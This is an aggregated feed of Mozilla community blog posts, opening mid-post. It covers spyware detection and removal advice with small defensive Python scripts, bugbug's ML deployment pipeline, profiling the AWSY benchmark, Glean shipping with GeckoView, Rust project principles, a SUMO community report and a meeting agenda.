Leveraging crowd-sourced information to locate precisely where interruptive sponsored segments appear in videos, SponsorBlock automatically skips those segments for you, drawing on its ever-growing database of videos. You can also participate in the project by reporting sponsored segments whenever you encounter them (it’s easy to report right there on the video page with the extension).

SponsorBlock can also learn to skip non-music portions of music videos as well as intros and outros. If you’d like a deeper dive into SponsorBlock, we profiled its developer and open source project on Mozilla Distilled.

We hope one of these extensions enhances the way you enjoy YouTube. Feel free to explore more great media extensions on addons.mozilla.org.

 

The Mozilla BlogDid you hear about Apple’s security vulnerability? Here’s how to find and remove spyware.

Spyware has been in the news recently with stories like the Apple security vulnerability that allowed devices to be infected without the owner knowing it, and a former editor of The New York Observer being charged with a felony for unlawfully spying on his spouse with spyware. Spyware is a sub-category of malware that’s aimed at surveilling the behavior of human target(s) using a given device where the spyware is running. This surveillance could include but is not limited to logging keystrokes, capturing what websites you are visiting, looking at your locally stored files/passwords, and capturing audio or video within proximity to the device.

How does spyware work?

Spyware, much like any other malware, doesn’t just appear on a device. It often needs to first be installed or initiated. Depending on the type of device, this could manifest in a variety of ways, but here are a few specific examples:

  • You could visit a website with your web browser and a pop-up prompts you to install a browser extension or addon.
  • You could visit a website and be asked to download and install some software you didn’t go there to get.
  • You could visit a website that prompts you to access your camera or audio devices, even though the website doesn’t legitimately have that need.
  • You could leave your laptop unlocked and unattended in a public place, and someone could install spyware on your computer.
  • You could share a computer or your password with someone, and they secretly install the spyware on your computer.
  • You could be prompted to install a new and unknown app on your phone.
  • You could install pirated software on your computer that additionally contains spyware functionality.

With all the above examples, the bottom line is that there could be software running with a surveillance intent on your device. Once installed, it’s often difficult for a layperson to have 100% confidence that their device can be trusted again, but for many the hard part is first detecting that surveillance software is running on the device at all.

How to detect spyware on your computer and phone

As mentioned above, spyware, like any malware, can be elusive and hard to spot, especially for a layperson. However, there are some ways by which you might be able to detect spyware on your computer or phone that aren’t overly complicated to check for.

Cameras

On many types of video camera devices, you get a visual indication that the video camera is recording. This is often a hardware-controlled light of some kind that indicates the device is active. If you are not actively using your camera and these camera indicator lights are on, it could be a signal that you have software on your device that is actively recording you, and it could be some form of spyware.

Here’s an example of what camera indicator lights look like on some Apple devices, but active camera indicators come in all kinds of colors and formats, so be sure to understand how your device works. A good way to test is to turn on your camera and find out exactly where these indicator lights are on your devices.

Additionally, you could make use of a webcam cover. These are small mechanical devices that allow users to manually open and shut cameras only when in use. They are generally a very cheap and low-tech way to protect against snooping via cameras.

Applications

One pretty basic way to detect malicious spyware on a system is simply to review installed applications, and to keep only the applications you actively use installed.

On Apple devices, you can review your Applications folder and the App Store to see what applications are installed. If you notice something is installed that you don’t recognize, you can attempt to uninstall it. For Windows computers, you’ll want to check the Apps folder in your Settings.

Web extensions

Many browsers, like Firefox or Chrome, have extensive web extension ecosystems that allow users to customize their browsing experience. However, it’s not uncommon for malware authors to use web extensions as a medium for surveilling a user’s browsing activity.

On Firefox, you can visit about:addons and view all your installed web extensions. On Chrome, you can visit chrome://extensions and view all your installed web extensions. You are basically looking for any web extensions that you didn’t actively install on your own. If you don’t recognize a given extension, you can attempt to uninstall it or disable it.
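
If you’d rather audit a Firefox profile from a script than click through about:addons, something along these lines can work. It reads the profile’s extensions.json; treat it as a sketch, since the profile path is machine-specific (the example uses a typical Linux location) and the exact field names can vary between Firefox versions:

import json
from pathlib import Path

# Adjust to your own profile directory (see about:profiles for the path).
PROFILE_DIR = Path.home() / ".mozilla" / "firefox" / "xxxxxxxx.default-release"

def list_extensions(profile_dir: Path) -> None:
    """Print the id, name and enabled state of every installed extension."""
    data = json.loads((profile_dir / "extensions.json").read_text())
    for addon in data.get("addons", []):
        if addon.get("type") != "extension":
            continue  # skip themes, dictionaries, langpacks, ...
        name = (addon.get("defaultLocale") or {}).get("name", "<unknown>")
        state = "enabled" if addon.get("active") else "disabled"
        print(f"{addon.get('id')}: {name} ({state})")

list_extensions(PROFILE_DIR)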


How do you remove spyware from your device?

If you recall an odd link, attachment, download or website you interacted with around the time you started noticing issues, that could be a great place to start when trying to clean your system. There are various free online tools you can leverage to help get a signal on what caused the issues you are experiencing; VirusTotal, UrlVoid and HybridAnalysis are just a few examples. These tools can help you determine when the compromise of your system occurred. How they do this varies, but the general idea is that you give them the file or URL you are suspicious of, and they return a report showing what various computer security companies know about it. A point of infection, combined with your browser’s history, gives you a starting point for the accounts you will need to double-check for signs of fraudulent or malicious activity after you have cleaned your system. This isn’t strictly necessary in order to clean your system, but it helps jumpstart your recovery from a compromise.
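
As an illustration of how these lookups work, here is a rough sketch that checks a file’s hash against VirusTotal’s v3 API using the requests library. The API key and file name are placeholders, and the response fields shown are from memory, so double-check against the VirusTotal documentation before relying on it:

import hashlib
import requests

API_KEY = "your-virustotal-api-key"  # placeholder

def sha256_of(path: str) -> str:
    # Hash the suspicious file locally so only the hash leaves your machine.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def lookup(path: str) -> None:
    resp = requests.get(
        "https://www.virustotal.com/api/v3/files/" + sha256_of(path),
        headers={"x-apikey": API_KEY},
        timeout=30,
    )
    if resp.status_code == 404:
        print("VirusTotal has never seen this file.")
        return
    resp.raise_for_status()
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    print(f"malicious: {stats.get('malicious', 0)}, suspicious: {stats.get('suspicious', 0)}")

lookup("suspicious-download.exe")  # hypothetical file name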

There are a couple of paths that can be followed in order to make sure any spyware is entirely removed from your system and give you peace of mind:

Install an antivirus (AV) software from a well-known company and run scans on your system

  • If you have a Windows device, Windows Defender comes pre-installed, and you should double-check that you have it turned on.
  • If you currently have an AV software installed, make sure it’s turned on and that it’s up to date. Should it fail to identify and remove the spyware from your system, then it’s on to one of the following options.

Run a fresh install of your system’s operating system

  • While it might be tempting to back up files you have on your system, be careful: remember that your device was compromised, and the file causing the issue could end up back on your system and compromise it again.
  • The best way to do this would be to wipe the hard drive of your system entirely, and then reinstall from an external device.

How can you protect yourself from getting spyware?

There are a lot of ways to help keep your devices safe from spyware, and in the end it can all be boiled down to employing a little healthy skepticism and practicing good basic digital hygiene. These tips will help you stay on the right track:

Be wary. Don’t click on links or open/download attachments from unknown senders. This applies to messaging apps as well as email.

Stay updated. Take the time to install updates/patches. This helps make sure your devices and apps are protected against known issues.

Check legitimacy. If you aren’t sure whether a website or email is giving legitimate information, take the time to use your favorite search engine to find the legitimate website. This helps avoid issues with typos potentially leading you to a bad website.

Use strong passwords. Ensure all your devices have solid passwords that are not shared. It’s easier to break into a house that isn’t locked.

Delete extras. Remove applications you don’t use anymore. This reduces the total attack surface you are exposing, and has the added bonus of saving space for things you care about.

Use security settings. Enable built in browser security features. By default, Firefox is on the lookout for malware and will alert you to Deceptive Content and Dangerous Software.

The post Did you hear about Apple’s security vulnerability? Here’s how to find and remove spyware. appeared first on The Mozilla Blog.

Marco Castellucciobugbug infrastructure: continuous integration, multi-stage deployments, training and production services

bugbug started as a project to automatically assign a type to bugs (defect vs enhancement vs task, back when we introduced the “type” we needed a way to fill it for already existing bugs), and then evolved to be a platform to build ML models on bug reports: we now have many models, some of which are being used on Bugzilla, e.g. to assign a type, to assign a component, to close bugs detected as spam, to detect “regression” bugs, and so on.

Then, it evolved to be a platform to build ML models for generic software engineering purposes: we no longer only have models that operate on bug reports, but also models that operate on test data, patches/commits (e.g. to choose which tests to run for a given patch and to evaluate the regression riskiness associated with a patch), and so on.

Its infrastructure also evolved over time and slowly became more complex. This post attempts to clarify its overall infrastructure, composed of multiple pipelines and multi-stage deployments.

The nice aspect of the continuous integration, deployment and production services of bugbug is that almost all of them are running completely on Taskcluster, with a common language to define tasks, resources, and so on.

In bugbug’s case, I consider a release as a code artifact (source code at a given tag in our repo) plus the ML models that were trained with that code artifact and the data that was used to train them. This is because the results of a given model are influenced by all these aspects, not just the code as in other kinds of software. Thus, in the remainder of this post, I will refer to “code artifact” or “code release” when talking about a new version of the source code, and to “release” when talking about a set of artifacts that were built with a specific snapshot (version) of the source code and with a specific snapshot of the data.
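
To make that distinction concrete, a release can be thought of as a small record like the following; the field names here are mine for illustration, not anything bugbug actually defines:

from dataclasses import dataclass

@dataclass(frozen=True)
class Release:
    """Code at a tag, plus the models trained from it, plus the data they saw."""
    code_tag: str          # e.g. a git tag for the source snapshot
    data_snapshot: str     # identifier for the training data snapshot
    model_artifacts: dict  # model name -> hash/URL of the trained artifact

release = Release(
    code_tag="v0.0.1",                           # hypothetical tag
    data_snapshot="2021-09-01",                  # hypothetical snapshot date
    model_artifacts={"component": "sha256:..."}, # hypothetical trained model
)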

The overall infrastructure can be seen in this flowchart, where the nodes represent artifacts and the subgraphs represent the set of operations performed on them. The following sections of the blog post describe the components of the flowchart in more detail.

Flowchart of the bugbug infrastructure

Continuous Integration and First Stage (Training Pipeline) Deployment

Every pull request and push to the repository triggers a pipeline of Taskcluster tasks to:

  • run tests for the library and its linked HTTP service;
  • run static analysis and linting;
  • build Python packages;
  • build the frontend;
  • build Docker images.

Code releases are represented by tags. A push of a tag triggers additional tasks that perform:

  • integration tests;
  • push of Docker images to DockerHub;
  • release of a new version of the Python package on PyPI;
  • update of the training pipeline definition.

After a code release, the training pipeline which performs ML training is updated, but the HTTP service, the frontend and all the production pipelines that depend on the trained ML models (the actual release) are still on the previous version of the code (since they can’t be updated until the new models are trained).

Continuous Training and Second Stage (ML Model Services) Deployment

The training pipeline runs on Taskcluster as a hook that is either triggered manually or on a cron.
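
For the manual case, a hook can be triggered with the Taskcluster Python client along these lines; the root URL, credentials, and hook IDs below are placeholders rather than bugbug’s real ones:

import taskcluster

options = {
    "rootUrl": "https://firefox-ci-tc.services.mozilla.com",   # assumed deployment
    "credentials": {"clientId": "...", "accessToken": "..."},  # needs the hooks trigger scope
}

hooks = taskcluster.Hooks(options)

# Fire the training pipeline by hand instead of waiting for the cron trigger.
hooks.triggerHook(
    "project-example",  # hypothetical hook group ID
    "bugbug-training",  # hypothetical hook ID
    {},                 # trigger payload
)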

The training pipeline consists of many tasks that:

  • retrieve data from multiple sources (version control system, bug tracking systems, Firefox CI, etc.);
  • generate intermediate artifacts that are used by later stages of the pipeline, by other pipelines, or by other services;
  • train ML models using the above (there are also training tasks that depend on other models being trained and run first to generate intermediate artifacts);
  • check training metrics to ensure there are no short term or long term regressions;
  • run integration tests with the trained models;
  • build Docker images with the trained models;
  • push Docker images with the trained models;
  • update the production pipelines definition.

After a run of the training pipeline, the HTTP service and all the production pipelines are updated to the latest version of the code (if they weren’t already) and to the latest version of the trained models.

Production pipelines

There are multiple production pipelines (here’s an example) that serve different objectives, all running on Taskcluster and triggered either on cron or by pulse messages from other services.

Frontend

The bugbug UI lives at https://changes.moz.tools/, and it is simply a static frontend built in one of the production pipelines defined in Taskcluster.

The production pipeline performs a build and uploads the artifact to S3 via Taskcluster, which is then exposed at the URL mentioned earlier.

HTTP Service

The HTTP service is the only piece of the infrastructure that is not running on Taskcluster, but currently on Heroku.

The Docker images for the service are built as part of the training pipeline in Taskcluster; the trained ML models are included in the Docker images themselves. This way, it is possible to roll back to an earlier version of the code and models, should a new one present a regression.

There is one web worker that answers requests from users, and multiple background workers that perform ML model evaluations. These must be done in the background for performance reasons (the web worker must answer quickly). The ML evaluations themselves are quick, and so could be done directly in the web worker, but the input data preparation can be slow, as it requires interaction with external services such as Bugzilla or a remote Mercurial server.
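
That split is the classic enqueue-from-the-web-process, evaluate-in-a-worker pattern. A generic sketch with Flask, Redis and RQ (an illustration of the pattern, not necessarily the stack the service actually uses) might look like this:

from flask import Flask, jsonify, request
from redis import Redis
from rq import Queue

app = Flask(__name__)
queue = Queue(connection=Redis())  # background workers consume jobs from this queue

def evaluate_model(bug_id: int) -> dict:
    # Slow part: fetch the bug from Bugzilla, build features, run the model.
    return {"bug_id": bug_id, "label": "placeholder"}

@app.route("/classify", methods=["POST"])
def classify():
    job = queue.enqueue(evaluate_model, request.json["bug_id"])
    return jsonify({"job_id": job.get_id()}), 202  # answer immediately

@app.route("/result/<job_id>")
def result(job_id):
    job = queue.fetch_job(job_id)
    if job is None or job.result is None:
        return jsonify({"ready": False}), 202
    return jsonify({"ready": True, "result": job.result})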

Paul BoneRunning the AWSY benchmark in the Firefox profiler

The Are We Slim Yet (AWSY) benchmark measures memory usage. Recently I made a simple change to Firefox that I expected might save a bit of memory, but it actually increased memory usage on the AWSY benchmark.

We have lots of tools to hunt down memory usage problems. But to see an almost "log" of when garbage collection and cycle collection occur, the Firefox profiler is amazing.

I wanted to profile the AWSY benchmark to try and understand what was happening with GC scheduling. But it didn’t work out-of-the-box. This is one of those blog posts I’m writing down so that next time this happens, to me or anyone else (although I am selfish), and I web-search for "AWSY and Firefox Profiler", I want this to be the number 1 result and help me (or someone else) out.

The normal instructions

First you need a build with profiling enabled. Put this in your mozconfig

ac_add_options --enable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-optimize
ac_add_options --enable-profiling

The instructions to get the profiler to run came from Ted Campbell. Thanks Ted.

Ted’s instructions disabled stack sampling; we didn’t care about that since the data we need comes from profile markers. I can also run a reduced AWSY test, because 10 entities is enough to reproduce the problem.

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES="nostacksampling"
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

But it crashes due to Bug 1710408.

So I can’t use nostacksampling, which would have been nice to save some memory/disk space. Never mind.

So I removed that option, but then I got profiles that were too short. The profiler records into a circular buffer, so if that buffer is too small it’ll discard the earlier information. In this case I want the earlier information, because I think something at the beginning is the problem. So I need to add this to get a bigger buffer. The default is 4 million entries (32MB).

export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))

But now the profiles are too big and Firefox shutdown times out (over 70 seconds) so the marionette test driver kills Firefox before it can write out the profile.
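
For a sense of scale, here is the back-of-the-envelope arithmetic, assuming the ~8 bytes per entry implied by the stated default (4 million entries being 32MB):

bytes_per_entry = (32 * 1024 * 1024) / (4 * 1024 * 1024)  # 8.0 bytes, from the stated default
buffer_bytes = 200 * 1024 * 1024 * bytes_per_entry        # the entry count set above
print(buffer_bytes / (1024 ** 3))                         # roughly 1.56 GiB of profiler buffer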

The solution

So we hack testing/marionette/client/marionette_driver/marionette.py to replace shutdown_timeout with 300 in some places. Setting DEFAULT_SHUTDOWN_TIMEOUT and also self.shutdown_timeout to 300 will do (a sketch of the edit is shown after the invocation below). There’s probably a way to pass a parameter, but I haven’t found it yet. So after making that change and running ./mach build, the invocation is now:

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES=""
export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

And it writes an awsy-profile.json into the root directory of the project.
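
For reference, the marionette.py hack itself is roughly the following; this is a sketch of the two assignments described above, not an exact diff of the real file:

# testing/marionette/client/marionette_driver/marionette.py (sketch, not an exact diff)

# Bump the module-level default so a slow shutdown isn't treated as a hang:
DEFAULT_SHUTDOWN_TIMEOUT = 300  # seconds; gives Firefox time to write the profile

class Marionette:
    def __init__(self, shutdown_timeout=DEFAULT_SHUTDOWN_TIMEOUT):
        # Pin the instance attribute too, in case a caller passes a smaller value.
        self.shutdown_timeout = 300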

Hurray!

Data@MozillaThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we’re finally shipping the Rust parts of the Glean Android SDK with GeckoView and consuming them in Android Components and Fenix. And it still all works, collects data and sends pings! Additionally this results in a slightly smaller APK.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

Jan-Erik RedigerThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we're finally shipping the Rust parts of the Glean Android SDK with GeckoView and consuming them in Android Components and Fenix. And it still all works, collects data and sends pings! Additionally this results in a slightly smaller APK.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

Niko MatsakisRustacean Principles, continued

RustConf is always a good time for reflecting on the project. For me, the last week has been particularly “reflective”. Since announcing the Rustacean Principles, I’ve been having a number of conversations with members of the community about how they can be improved. I wanted to write a post summarizing some of the feedback I’ve gotten.

The principles are a work-in-progress

Sparking conversation about the principles was exactly what I was hoping for when I posted the previous blog post. The principles have mostly been the product of Josh and me iterating, and hence reflect our experiences. While the two of us have been involved in quite a few parts of the project, for the document to truly serve its purpose, it needs input from the community as a whole.

Unfortunately, for many people, the way I presented the principles made it seem like I was trying to unveil a fait accompli, rather than seeking input on a work-in-progress. I hope this post makes the intention more clear!

The principles as a continuation of Rust’s traditions

Rust has a long tradition of articulating its values. This is why we have a Code of Conduct. This is why we wrote blog posts like Fearless Concurrency, Stability as a Deliverable and Rust Once, Run Anywhere. Looking past the “engineering side” of Rust, aturon’s classic blog posts on listening and trust (part 1, part 2, part 3) did a great job of talking about what it is like to be on a Rust team. And who could forget the whole “fireflowers” debate?1

My goal with the Rustacean Principles is to help coalesce the existing wisdom found in those classic Rust blog posts into a more concise form. To that end, I took initial inspiration from how AWS uses tenets, although by this point the principles have evolved into a somewhat different form. I like the way tenets use short, crisp statements that identify important concepts, and I like the way assigning a priority ordering helps establish which should have priority. (That said, one of Rust’s oldest values is synthesis: we try to find ways to resolve constraints that are in tension by having our cake and eating it too.)

Given all of this backdrop, I was pretty enthused by a suggestion that I heard from Jacob Finkelman. He suggested adapting the principles to incorporate more of the “classic Rust catchphrases”, such as the “no new rationale” rule described in the first blog post from aturon’s series. A similar idea is to incorporate the lessons from RFCs, both successful and unsuccessful (this is what I was going for in the case studies section, but that clearly needs to be expanded).

The overall goal: Empowerment

My original intention was to structure the principles as a cascading series of ideas:

  • Rust’s top-level goal: Empowerment
    • Principles: Dissecting empowerment into its constituent pieces – reliable, performant, etc – and analyzing the importance of those pieces relative to one another.
      • Mechanisms: Specific rules that we use, like type safety, that engender the principles (reliability, performance, etc.). These mechanisms often work in favor of one principle, but can work against others.

wycats suggested that the site could do a better job of clarifying that empowerment is the top-level, overriding goal, and I agree. I’m going to try and tweak the site to make it clearer.

A goal, not a minimum bar

The principles in “How to Rustacean” were meant to be aspirational: a target to reach for. We’re all human: nobody does everything right all the time. But, as Matklad describes, the principles could be understood as setting up a kind of minimum bar – to be a team member, one has to show up, follow through, trust and delegate, all while bringing joy? This could be really stressful for people.

The goal for the “How to Rustacean” section is to be a way to lift people up by giving them clear guidance for how to succeed; it helps us to answer people when they ask “what should I do to get onto the lang/compiler/whatever team”. The internals thread had a number of good ideas for how to help it serve this intended purpose without stressing people out, such as cuviper’s suggestion to use fictional characters like Ferris in examples, passcod’s suggestion of discussing inclusion, or Matklad’s proposal to add something to the effect of “You don’t have to be perfect” to the list. Iteration needed!

Scope of the principles

Some people have wondered why the principles are framed in a rather general way, one that applies to all of Rust, instead of being specific to the lang team. It’s a fair question! In fact, they didn’t start this way. They started their life as a rather narrow set of “design tenets for async” that appeared in the async vision doc. But as those evolved, I found that they were starting to sound like design goals for Rust as a whole, not specifically for async.

Trying to describe Rust as a “coherent whole” makes a lot of sense to me. After all, the experience of using Rust is shaped by all of its facets: the language, the libraries, the tooling, the community, even its internal infrastructure (which contributes to that feeling of reliability by ensuring that the releases are available and high quality). Every part has its own role to play, but they are all working towards the same goal of empowering Rust’s users.2

There is an interesting question about the long-term trajectory for this work. In my mind, the principles remain something of an experiment. Presuming that they prove to be useful, I think that they would make a nice RFC.

What about “easy”?

One final bit of feedback I heard from Carl Lerche is surprise that the principles don’t include the word “easy”. This is not an accident. I felt that “easy to use” was too subjective to be actionable, and that the goals of productive and supportive were more precise. However, I do think that for people to feel empowered, it’s important for them not to feel mentally overloaded, and Rust can definitely have the problem of carrying a high mental load sometimes.

I’m not sure the best way to tweak the “Rust empowers by being…” section to reflect this, but the answer may lie with the Cognitive Dimensions of Notation. I was introduced to these by Felienne Hermans’ excellent book The Programmer’s Brain; I quite enjoyed this journal article as well.

The idea of the CDN is to try and elaborate on the ways that tools can be easier or harder to use for a particular task. For example, Rust would likely do well on the “error prone” dimension, in that when you make changes, the compiler generally helps ensure they are correct. But Rust does tend to have a high “viscosity”, because making local changes tends to be difficult: adding a lifetime, for example, can require updating data structures all over the code in an annoying cascade.

It’s important though to keep in mind that the CDN will vary from task to task. There are many kinds of changes one can make in Rust with very low viscosity, such as adding a new dependency. On the other hand, there are also cases where Rust can be error prone, such as mixing async runtimes.

Conclusion

In retrospect, I wish I had introduced the concept of the Rustacean Principles in a different way. But the subsequent conversations have been really great, and I’m pretty excited by all the ideas on how to improve them. I want to encourage folks again to come over to the internals thread with their thoughts and suggestions.

  1. Love that web page, brson

  2. One interesting question: I do think that some tools may vary the prioritization of different aspects of Rust. For example, a tool for formal verification is obviously aimed at users that particularly value reliability, but other tools may have different audiences. I’m not sure yet the best way to capture that; it may well be that each tool can have its own take on the way that it particularly empowers.

Support.Mozilla.OrgWhat’s up with SUMO – September 2021

Hey SUMO folks,

September is going to be the last month for Q3, so let’s see what we’ve been up to for the past quarter.

Welcome on board!

  1. Welcome to the SUMO family, Bithiah, mokich1one, handisutrian, and Pomarańczarz! Bithiah has been pretty active in contributing to the support forum for a while now, while Mokich1one, Handi, and Pomarańczarz are emerging localization contributors for Japanese, Bahasa Indonesia, and Polish respectively.

Community news

  • Read our post about the advanced customization in the forum and KB here and let us know if you still have any questions!
  • Please join me to welcome Abby into the Customer Experience Team. Abby is our new Content Manager who will be in charge of our Knowledge Base as well as Localization effort. You can learn more about Abby soon.
  • Learn more about Firefox 92 here.
  • Can you imagine what’s gonna happen when we reach version 100? Learn more about the experiment we’re running in Firefox Nightly here and see how you can help!
  • Are you a fan of Firefox Focus? Join our upcoming foxfooding campaign for Focus. You can learn more about the campaign here.
  • No Kitsune update for this month. Check out SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in August!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB pageviews (*)

Month | Page views | Vs previous month
Aug 2021 | 8,462,165 | +2.47%

* KB pageviews number is a total of KB pageviews for /en-US/ only

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Thomas8
  3. Michele Rodaro
  4. K_alex
  5. Pierre Mozinet

KB Localization

Top 10 locale based on total page views

Locale | Aug 2021 pageviews (*) | Localization progress (per Sep 7) (**)
de | 8.57% | 99%
zh-CN | 6.69% | 100%
pt-BR | 6.62% | 63%
es | 5.95% | 44%
fr | 5.43% | 91%
ja | 3.93% | 57%
ru | 3.70% | 100%
pl | 1.98% | 100%
it | 1.81% | 86%
zh-TW | 1.45% | 6%

* Locale pageviews is the overall pageviews from the given locale (KB and other pages)

** Localization progress is the percentage of localized articles out of all KB articles per locale

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. Michele Rodaro
  3. Jim Spentzos
  4. Soucet
  5. Artist

Forum Support

Forum stats

Month | Total questions | Answer rate within 72 hrs | Solved rate within 72 hrs | Forum helpfulness
Aug 2021 | 3523 | 75.59% | 17.40% | 66.67%

Top 5 forum contributors in the last 90 days: 

  1. FredMcD
  2. Cor-el
  3. Jscher2000
  4. Seburo
  5. Sfhowes

Social Support

Channel | Total conv (Aug 2021) | Conv interacted (Aug 2021)
@firefox | 2967 | 341
@FirefoxSupport | 386 | 270

Top contributors in Aug 2021

  1. Christophe Villeneuve
  2. Andrew Truong
  3. Pravin

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

Firefox mobile

Other products / Experiments

  • Mozilla VPN V2.5 is expected to release on 09/15
  • Fx Search experiment:
    • From Sept 6, 2021 1% of the Desktop user base will be experimenting with Bing as the default search engine. The study will last into early 2022, likely wrapping up by the end of January.
    • Common response:
      • Forum: Search study – September 2021
      • Conversocial clipboard: “Mozilla – Search study sept 2021”
      • Twitter: Hi, we are currently running a study that may cause some users to notice that their default search engine has changed. To revert back to your search engine of choice, please follow the steps in the following article → https://mzl.la/3l5UCLr
  • Firefox Suggest + Data policy update (Sept 16 + Oct 5)
    • On September 16th, the Mozilla Privacy Policy will be updated to supplement the roll out of FX Suggest online mode. Currently, FX Suggest is utilizing offline mode, which limits the data collected. Online mode will collect additional anonymized information after users opt in to this feature. Users can opt out of this experience by following the instructions here.

Shout-outs!

  • Kudos to Julie for her work on the Knowledge Base lately. She’s definitely adding a new color to our KB world with her video and article improvements.
  • Thanks to those who contributed to the FX Desktop Topics Discussion
    • If you have input or questions please post them to the thread above

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

Niko MatsakisCTCFT 2021-09-20 Agenda

The next “Cross Team Collaboration Fun Times” (CTCFT) meeting will take place next Monday, on 2021-09-20 (in your time zone)! This post covers the agenda. You’ll find the full details (along with a calendar event, zoom details, etc) on the CTCFT website.

Agenda

  • Announcements
  • Interest group panel discussion

We’re going to try something a bit different this time! The agenda is going to focus on Rust interest groups and domain working groups, those brave explorers who are trying to put Rust to use in all kinds of interesting domains. Rather than having fixed presentations, we’re going to have a panel discussion with representatives from a number of Rust interest groups and domain groups, led by AngelOnFira. The idea is to open a channel for discussing how to have more active communication and feedback between interest groups and the Rust teams (in both directions).

Afterwards: Social hour

After the CTCFT this week, we are going to try an experimental social hour. The hour will be coordinated in the #ctcft stream of the rust-lang Zulip. The idea is to create breakout rooms where people can gather to talk, hack together, or just chill.